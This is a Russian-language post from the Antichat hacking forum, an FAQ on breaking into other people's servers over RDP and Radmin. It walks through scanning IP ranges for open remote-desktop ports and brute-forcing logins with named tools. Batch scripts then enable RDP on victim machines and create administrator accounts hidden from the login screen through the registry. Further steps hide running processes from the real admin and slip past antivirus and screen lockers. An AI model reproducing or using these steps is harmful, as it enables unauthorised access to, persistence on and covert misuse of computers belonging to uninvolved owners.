ANTICHAT - Большой F.A.Q. по брруту дедиков

Большой F.A.Q. по бруту дедиков

В этой статье я постараюсь более мение полностью описать весь процес брута дедиков и работу на дедике.

И так приступим:

1.Что такое дедик?

Дедик - пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация

служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.

2.Для чего предназначены дедики?

Дедики можно использовать для абосолютно разных целей например для интернет серфинга, для брута, спама, можно ставить на нем игровые сервера (например я много раз находил на дедиках сервера кс) и т.д.

3.Где достать дедик?

Дедик можно купить, сбрутить или добыть с помощю трояна.

4.Брут дедиков

-Брут RDP

RDP - протокол удалённого рабочего стола.

Для брута RDP нам понадобитса следующие программы DuBrute RC2(сам брут)VT, vnc_scanner_GUI VT(сканер портов) и можно еще ipgeobase VT(база данных IP адресов). Программы не обязательно эти, можно и другие, но лично я пользуюсь етими.

И так приступим.

1.Запустите ipgeobase выберите округ, регин или город, скопируйте все ип адреса в буфер.

2.Теперь запустите vnc_scanner_GUI и вставте в самое большое поле все ип адреса.

И настроим его так:

http://i.pixs.ru/storage/1/4/8/Bezim...30_6844148.jpg

Теперь нажимаем Start Scan и ждем окончания работы.

По окончании работы нажимаем Start Parser, теперь в файле IPs.txt сохранятса все ип адреса с открытым 3389 портом.

3.Запускаем DuBrute RC2 и нажимаем Generation.

Теперь нажимаем File IP и выбираем наш IPs.txt

Нажимаем File Login и выбираем файл с логинами(можно добавить свои) обычно Login.txt

Нажимаем File Pass и выбираем файл с паролями (тоже можете добавить свои) обычно Pass.txt

Нажимаем Make и можем закрывать это окно.

Теперь в папке с брутом в файле source.txt записаны все комбинации ип адресов, логинов и паролей.

Нажимаем Config и Настроим его так:

http://i.pixs.ru/storage/1/6/3/Bezim...48_6844163.jpg

Нажимаем OK и все настройка брута закончена, нажимаем старт и ждем окончания работы.

После окончание работы все гуды сохранятса в файле good.txt

Вот и все на етом брут RDP закончен.

-Брут Radmin

1. Сам процес брута

Radmin - программа для удалённого доступа.

Для ее брута нам понадобитса lamescan3_r11 VT, ipgeobase VT и клент радмина radmin viewer VT

1.Приступим, сначала запускаем lamescan3_r11 и нажимаем Настройка->основное

Настроим его так:

http://s002.radikal.ru/i198/1010/b3/0d8a7a356860.jpg

закрываем окно и нажимаем Настройка->Интерфейс там укажите путь к радмину, и поставте все галочки.

Вот так:

http://i.pixs.ru/storage/1/1/8/Bezim...58_6844118.jpg

2.Запустите ipgeobase выберите округ, регин или город, скопируйте все ип адреса, в lamescan нажмите Диапазоны->Добавить в очередь->Список диапазонов, вставляем туда ип адреса и нажимаем Готово.

Теперь включаем сканирование(зеленый треугольник) и ждем окончание работы.

После окончания работы можете спокойно подлючатса к хосам к которым подобран пароль.

Вот и все на етом брут Radminа закончен.

2.Что делать дальше?

После того как вы сбрутили несколько радминов нам понадобитса сделать с них дедик т.е. включить RDP(удалённый рабочий стол), и пропатчить систему на мультиюзерность(чтобы вы и админ не мешали друг другу).

Приступим, включить RDP можно так:

-Щелкаем Правой кнопкой мышки на Мой компютер->Свойства

-Переходим на вкладку "Удалённые сеансы"

-Ставим везде галочки

или с помощю батника:

@Echo off

netsh firewall set service remoteadmin enable

netsh firewall set service remotedesktop enable

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Чтобы запустить батник на компютере у жертвы надо с помощю передачи файлов закинуть батник в недры виндовса и подключитса к командной строке, командой "cd Имя каталога" перейти в папку в которую положили батник и ввести в ней имя батника например batnik.bat

Чтобы включить мультиюзерность надо пропатчить систему следующим патчем TS_Free VT и перезагрузить компютер, запустить его можно также с использованием командной строки.

Вот и все теперь можете подключитса к компютеру по RDP, но пользователя у вас пока не будет, как его создать читайте далее.

5.Как создать и скрыть пользователя на дедике?

Не буду розказывать о всех способах создание пользователя т.к. ето замет много времени, розкажу о основных.

1.С помощю Управление компютером

-Щелкаем Правой кнопкой мышки на Мой компютер->Управление

-Локальные пользователи и группы->Пользователи->Правая кнопка мыши Новый пользователь и вводим имя, пароль и тд.(Галочку поставте только на 3 пункте)

2.С помощю cmd

Включаем cmd и создаем пользователя командами:

net user Имя Пароль/add

net localgroup Група администраторов Имя /add

net localgroup Група пользователей RDP Имя /add

net accounts /maxpwage:unlimited

3.С помощю батника который создает и сразу скрывает пользователя с екрана приветствий

Set AdmGroupSID=S-1-5-32-544

Set AdmGroup=

For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J

Set AdmGroup=%AdmGroup:~0,-1%

net user Имя_пользователя Пароль /add

net localgroup %AdmGroup% Имя_пользователя /add

Set RDPGroupSID=S-1-5-32-555

Set RDPGroup=

For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J

Set RDPGroup=%RDPGroup:~0,-1%

net localgroup "%RDPGroup%" Имя_пользователя /add

net accounts /maxpwage:unlimited

reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v Имя_пользователя /t REG_DWORD /d "00000000" /f

4.С помошю программы DED C14 vt она создаст и скроет пользователя.

5.Скрыть пользователя.

Вот мы создали пользователя теперь надо скрыть его с екрана приветствия при запуске виндовс и в папке Documents and Settings, на скрытьии в папке останавлеватса не буду надеюсь все это знают.

Чтобы скрыть пользователя в екране приветствия в ветке реестра

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t

нужно создать параметер типа DWORD с именем пользователя и значением 0.

Вот и все тепер на дедике у нас есть свой скрытый пользователь.

6.Как пользоватса дедиком не создавая пользователя(под админом) и не быть замеченым?

Для того чтобы использовать дедик не создавая пользователя (на пользователе админа) нам нужны следующие программы hidetoolz VT, PS Tray Factory VT, DelTrayIcon VT.

Начнем запускаем свои программы (с которыми вы собираетесь работать на дедике), все там запускаете, и теперь начнем их прятать:

- Запускаем PS Tray Factory и в первых двух вкаладках отмечаем приложения которые хотим скрыть и сворачеваим эго(не выключаем). Посе етого действия пропадут окна нашых програм, но останетсу процесы иконка PS Tray Factory.

- Запускаем DelTrayIcon и удаляем иконку PS Tray Factory и выключаем его. Мы удалили иконку PS Tray Factory осталось скрыть процесы PS Tray Factory и програм которые мы хотели скрыть.

- Запускаем hidetoolz и на процесах которые создали наши приложения нажимаем правую кнопку мыши->HIDE и выключаем его.

Если вы все сделали правильно то теперь наши программы работают на учетке админа полностю скрыто и он об етом даже не подозревает.

Тепер чтобы увидеть окна вашых програм включите hidetoolz и зделайте все процесы видимыми, убейте в деспетчере задач процес PS Tray Factory, система немного залагает и покажет вам окна всех програм которые вы скрыли.

7.Что делать если антивирус на дедике удаляет ваши программы?

Обяснять для каждого антивируса очень долго но розкажу в общем виде(если что поищите в гугле).

Нужно создать папку гдето в недрах виндовс, добавить в настройках антивируса нашу папку в исключения и скачать в нее все программы.

Если антивирь не разрешает изменений и просит пароль можем попытатса выключить его, или в крайнем случае поискать в текстовых документах админа пароль к ав. Удалять его не стоит так как админ сразу спалит вас и выгонит со своего компа.

8.Что делать если на дедике ScreenLocker?

Как обойти новые локеры я чесно говоря не знаю, но можно попытатса вызвать диспетчера задач комбинацией клавиш [Ctrl]+[Shift]+[Esc] и убить процес локера, или вызвать командную строку с помощю [Win]+[R] ввести cmd и в ней командами tasklist и taskkill убить процес локера, можно попытатса переключитса на другое окно с помощю [Alt]+[Tab] или если есть доступ до файлов с помощю техже команд что написал выше убить процес батником.

9.Как зайти на дедик?

Для того чтобы зайти на дедик нажимаем Пуск->Выполнить... у вас откроетса окно "Запуск программы" в нем пишем mstsc и нажимаем OK,

откроетса окно "Подключение к удаленному рабочему столу" в поле "Компьютер:" пишем ип адрес дедика, для более удобного доступа нажимаем кнопку "Параметры"

и в поле "Пользователь" пишем имя учетки, ставим галочку на "Разрешить мне сохранять учетные данные" и нажимаем Подключить,

появитса еще одно окно в нем пишем пароль и ставим галочку внизу, на нажимаем ОК и все вы на дедике, чтобы зайти на него еще раз вам просто будет нужно

выбрать ип дедика и нажать Подключить и ваш компютер автоматически введет логин и пароль к пользователю.

Когда вы ето все проделали в Параметры->Параметры подключение можно нажать сохранить как и сохранить файл с расширение .rdp потом надо будет только запустить файл и вы сразу окажетесь на дедике.

10.Как подключить свой локальный диск и буфер обмена к дедику?

Для того чтобы подключить к дедику свой локальный диск и буфер обмена в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Лкальные ресурсы" внизу ставим галочку на "Буфер обмена" и нажимаем "Подробнее" в открывшемся меню выбираем какое устройство вы хотите подключить и ставим галочку возле него(если подключить диск на котором установлена ваша ОС (Обычто диск C ) то можно будет ппередавать файлы через буфер обмена), нажимаем ОК и все готово, теперь вы можете намного легче и быстрее передать необходимые файлы на дедик, только не увлекайтесь етим потомучто ваш локальный диск будет доступен всем пользователям дедика т.е. админ увиди что подключилса ваш диск, потому надо быстро передать файлы, выйти из дедика, отключить диск и пользоватса дедиком далше.

11.Автоматически запустить свою прогу при входе на дедик

Вы можете запустить свою програму при подключении (обычно программы для сбора информации) для етого в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Программы", ставим галочку и в поле путь к программе и имя файла пишем "tsclient\\буква диска\путь к файлу" и нажимаем подключить.

Базы данных ип адресов стран можно найти на сайте www.proxysecurity.com

Вот и все на етом моя статья закончена если будут еще какието вопросы или идеи что добавить в статью говорите.

Прошу сильно не ругать это моя первая статья.